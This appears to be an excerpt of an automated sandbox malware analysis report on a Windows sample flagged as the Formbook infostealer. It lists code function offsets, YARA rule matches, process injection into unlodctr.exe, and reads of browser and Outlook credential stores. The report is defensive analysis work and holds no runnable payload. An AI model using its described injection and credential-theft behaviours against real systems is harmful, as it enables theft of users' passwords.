Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03174750 6_2_03174750
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03150770 6_2_03150770
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0314C7C0 6_2_0314C7C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0316C6E0 6_2_0316C6E0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03150535 6_2_03150535
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03210591 6_2_03210591
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031F4420 6_2_031F4420
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03202446 6_2_03202446
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031FE4F6 6_2_031FE4F6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320AB40 6_2_0320AB40
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03206BD7 6_2_03206BD7
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0314EA80 6_2_0314EA80
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03166962 6_2_03166962
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0321A9A6 6_2_0321A9A6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031529A0 6_2_031529A0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03152840 6_2_03152840
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0315A840 6_2_0315A840
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031368B8 6_2_031368B8
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0317E8F0 6_2_0317E8F0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03170F30 6_2_03170F30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031F2F30 6_2_031F2F30
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03192F28 6_2_03192F28
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031C4F40 6_2_031C4F40
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031CEFA0 6_2_031CEFA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03142FC8 6_2_03142FC8
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0315CFE0 6_2_0315CFE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320EE26 6_2_0320EE26
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03150E59 6_2_03150E59
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03162E90 6_2_03162E90
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320CE93 6_2_0320CE93
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320EEDB 6_2_0320EEDB
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031ECD1F 6_2_031ECD1F
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0315AD00 6_2_0315AD00
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03168DBF 6_2_03168DBF
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0314ADE0 6_2_0314ADE0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03150C00 6_2_03150C00
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031F0CB5 6_2_031F0CB5
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03140CF2 6_2_03140CF2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320132D 6_2_0320132D
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0313D34C 6_2_0313D34C
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0319739A 6_2_0319739A
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031552A0 6_2_031552A0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0316B2C0 6_2_0316B2C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031F12ED 6_2_031F12ED
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0321B16B 6_2_0321B16B
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0313F172 6_2_0313F172
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0318516C 6_2_0318516C
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0315B1B0 6_2_0315B1B0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320F0E0 6_2_0320F0E0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_032070E9 6_2_032070E9
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031FF0CC 6_2_031FF0CC
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031570C0 6_2_031570C0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320F7B0 6_2_0320F7B0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03195630 6_2_03195630
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_032016CC 6_2_032016CC
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03207571 6_2_03207571
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031ED5B0 6_2_031ED5B0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_032195C3 6_2_032195C3
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320F43F 6_2_0320F43F
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03141460 6_2_03141460
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320FB76 6_2_0320FB76
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0316FB80 6_2_0316FB80
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0318DBF9 6_2_0318DBF9
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031C5BF0 6_2_031C5BF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03207A46 6_2_03207A46
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320FA49 6_2_0320FA49
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031C3A6C 6_2_031C3A6C
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031EDAAC 6_2_031EDAAC
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03195AA0 6_2_03195AA0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031F1AA3 6_2_031F1AA3
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031FDAC6 6_2_031FDAC6
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031E5910 6_2_031E5910
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03159950 6_2_03159950
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0316B950 6_2_0316B950
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031BD800 6_2_031BD800
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031538E0 6_2_031538E0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320FF09 6_2_0320FF09
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03151F92 6_2_03151F92
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320FFB1 6_2_0320FFB1
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03113FD2 6_2_03113FD2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03113FD5 6_2_03113FD5
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03159EB0 6_2_03159EB0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03207D73 6_2_03207D73
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03153D40 6_2_03153D40
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_03201D5A 6_2_03201D5A
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0316FDC0 6_2_0316FDC0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_031C9C32 6_2_031C9C32
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0320FCF2 6_2_0320FCF2
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00831280 6_2_00831280
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0082C447 6_2_0082C447
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0082C450 6_2_0082C450
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0082A6F0 6_2_0082A6F0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_0082C670 6_2_0082C670
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00832DF0 6_2_00832DF0
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: 6_2_00849D70 6_2_00849D70
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0111EA12 appears 86 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 010F7E54 appears 102 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 010E5130 appears 58 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0112F290 appears 105 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 0109B970 appears 280 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 03197E54 appears 111 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 031CF290 appears 105 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 031BEA12 appears 86 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 03185130 appears 58 times
Source: C:\Windows\SysWOW64\unlodctr.exe Code function: String function: 0313B970 appears 280 times
Source: file.exe Static PE information: invalid certificate
Source: file.exe, 00000000.00000002.2073362646.000000000110E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.2074359905.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dllD vs file.exe
Source: file.exe, 00000000.00000000.2019369933.0000000000C28000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameURBY.exeX vs file.exe
Source: file.exe, 00000000.00000002.2078754266.0000000007D40000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dllD vs file.exe
Source: file.exe, 00000000.00000002.2075251092.000000000499E000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs file.exe
Source: file.exe, 00000000.00000002.2074210660.0000000002F00000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs file.exe
Source: file.exe, 00000002.00000002.2588936794.000000000119D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs file.exe
Source: file.exe, 00000002.00000002.2588802399.0000000000DE1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNLODCTR.EXEj% vs file.exe
Source: file.exe, 00000002.00000002.2588802399.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNLODCTR.EXEj% vs file.exe
Source: file.exe Binary or memory string: OriginalFilenameURBY.exeX vs file.exe
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3271480476.0000000000BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3270633150.0000000000820000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3271525357.0000000000C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3271198563.0000000001580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2588306707.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2588682104.0000000000D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3271543512.00000000041E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2590213953.00000000034A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.file.exe.302776c.3.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.302776c.3.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.7d70000.11.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.7d70000.11.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.3016af4.6.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.3016af4.6.raw.unpack, XG.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.file.exe.4c466d0.8.raw.unpack, cgf1Bx512PpTujvsru.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.2f00000.1.raw.unpack, rKwf1snFHRc5cByU6r.cs Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.2f00000.1.raw.unpack, rKwf1snFHRc5cByU6r.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.2f00000.1.raw.unpack, rKwf1snFHRc5cByU6r.cs Security API names: _0020.AddAccessRule
Source: 0.2.file.exe.2f00000.1.raw.unpack, cgf1Bx512PpTujvsru.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.4c466d0.8.raw.unpack, rKwf1snFHRc5cByU6r.cs Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.4c466d0.8.raw.unpack, rKwf1snFHRc5cByU6r.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.4c466d0.8.raw.unpack, rKwf1snFHRc5cByU6r.cs Security API names: _0020.AddAccessRule
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, rKwf1snFHRc5cByU6r.cs Security API names: _0020.SetAccessControl
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, rKwf1snFHRc5cByU6r.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, rKwf1snFHRc5cByU6r.cs Security API names: _0020.AddAccessRule
Source: 0.2.file.exe.4bc2cb0.9.raw.unpack, cgf1Bx512PpTujvsru.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.file.exe.3016af4.6.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.file.exe.7d70000.11.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: 0.2.file.exe.302776c.3.raw.unpack, ReactionVessel.cs Suspicious method names: .ReactionVessel.Inject
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@4/4
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log Jump to behavior
Source: C:\Users\user\Desktop\file.exe Mutant created: NULL
Source: C:\Users\user\Desktop\file.exe Mutant created: \Sessions\1\BaseNamedObjects\vZgtudTutLSw
Source: C:\Windows\SysWOW64\unlodctr.exe File created: C:\Users\user\AppData\Local\Temp\17-EIW25 Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unlodctr.exe, 00000006.00000002.3270803380.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000003.2801394553.00000000009D6000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000002.3270803380.00000000009E0000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000002.3270803380.0000000000A04000.00000004.00000020.00020000.00000000.sdmp, unlodctr.exe, 00000006.00000003.2801304113.00000000009B5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe ReversingLabs: Detection: 42%
Source: file.exe Virustotal: Detection: 55%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe"
Source: C:\Windows\SysWOW64\unlodctr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe Process created: C:\Windows\SysWOW64\unlodctr.exe "C:\Windows\SysWOW64\unlodctr.exe" Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: loadperf.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\LKVbfviIbyWIajZxIWpzywuiobTbckkYAurOVHOOlucIslpavLXAFuOIDsRwGHO\SIsaiIITJVPvUAG.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\unlodctr.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: unlodctr.pdbGCTL source: file.exe, 00000002.00000002.2588802399.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, SIsaiIITJVPvUAG.exe, 00000005.00000002.3271199728.0000000000958000.00000004.00000020.00020000.00000000.sdmp
